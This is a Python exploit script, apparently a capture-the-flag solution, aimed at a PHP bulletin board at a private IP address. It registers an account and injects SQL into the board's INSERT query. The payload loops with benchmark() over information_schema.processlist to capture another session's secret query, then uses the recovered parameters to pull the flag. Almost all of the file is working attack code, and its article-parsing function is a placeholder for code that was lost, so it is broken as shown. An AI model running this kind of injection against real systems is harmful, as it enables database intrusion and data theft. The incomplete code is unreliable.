import re
import threading
import time

import requests

ID = "sakuya"
PW = "sakuya"
TIMER = 10
HOST = "http://192.168.1.17/"


def Register(user, pw):
    # Create the account; the registration page answers "welcome" on success.
    s = requests.session()
    data = {"id": user, "pw": pw}
    RegPage = HOST + "reg_check.php"
    r = s.post(RegPage, data=data)
    if "welcome" not in r.text:
        return False
    return True


def Login(user, pw):
    # Log in and return the authenticated session, or False on failure.
    s = requests.session()
    data = {"id": user, "pw": pw}
    LoginPage = HOST + "login_check.php"
    r = s.post(LoginPage, data=data)
    if "Error" in r.text:
        return False
    return s


def secret_Refresh(s):
    # Thread 2: a second session keeps requesting the secret page so that the
    # query it runs is present in the server's processlist while thread 1 runs.
    SecretPage = HOST + "?p=secret"
    for i in range(1, TIMER):
        time.sleep(1)
        s.get(SecretPage)
        print("[Thread 2] Refresh Count[{}]".format(i))
    print("[Thread 2] Job done!!")


def write_bbs(s):
    # Thread 1: SQL injection in the board's INSERT. The payload loops over
    # information_schema.processlist and stores the collected queries as the
    # contents of a new post belonging to ID.
    SQL_Payload = "'),('answer','{}',(SELECT a.b FROM (SELECT @dummy, @query:='',@tmp:=0x20, benchmark(500000,(@tmp:= (SELECT Group_concat(info) FROM information_schema.processlist WHERE info not like '%dummy%' or sleep(0)))or(IF((@query not like concat('%',@tmp,'%')),@query:=concat(@query,@tmp,0x0a),0))), @query`b`)`a`))#".format(ID)
    data = {"title": "TITLE", "contents": SQL_Payload}
    WritePage = HOST + "write_ok.php"
    print("[Thread 1] Write BBS..")
    start = time.time()
    r = s.post(WritePage, data=data)
    if "OK" in r.text:
        end = time.time()
        print("[Thread 1] Write OK. {} second !!".format(end - start))
    else:
        print("Error Occur")


def getLastArticle(s):
    # Read back the post written by write_bbs and pull the C/T/F parameters
    # out of the captured secret-page query.
    BBSPage = HOST + "?p=diary"
    ReadPage = HOST + "?p=read&no="
    # The regex that locates the newest article on BBSPage, the request that
    # loads it from ReadPage and the cleanup that produces `contents` were
    # lost when this file was extracted; only the fragment
    #   patt = "',"")
    # survived. The placeholder below is not the original code.
    contents = ""  # placeholder for the fetched article body
    splited = contents.split("\n")
    for row in splited:
        if ID in row:
            splited = row.split(" ")
            T = splited[6].split("_")[2][:-1]
            F = splited[8].split("_")[1][:-3]
            C = splited[8].split("_")[2][:-2]
            return C, T, F


def getFlag(s, C, T, F):
    # Request the secret page with the recovered parameters and extract the flag.
    params = {"p": "secret", "C": C, "T": T, "F": F}
    r = s.get(HOST, params=params)
    patt = "FLAG{.*}"
    Flag = re.findall(patt, r.text)[0]
    return Flag


if __name__ == "__main__":
    print("[MAIN] Reg/Login")
    Register(ID, PW)
    s1 = Login(ID, PW)
    s2 = Login(ID, PW)
    print("[MAIN] Exploit, Query sniff")
    t1 = threading.Thread(target=write_bbs, args=(s1,))
    t2 = threading.Thread(target=secret_Refresh, args=(s2,))
    t1.start()
    t2.start()
    t2.join()
    t1.join()  # the original only joined t2; wait for the write before reading it back
    C, T, F = getLastArticle(s1)
    print("[MAIN] C: {}\nT: {}\nF: {}\n".format(C, T, F))
    print("[MAIN] FLAG : {}".format(getFlag(s2, C, T, F)))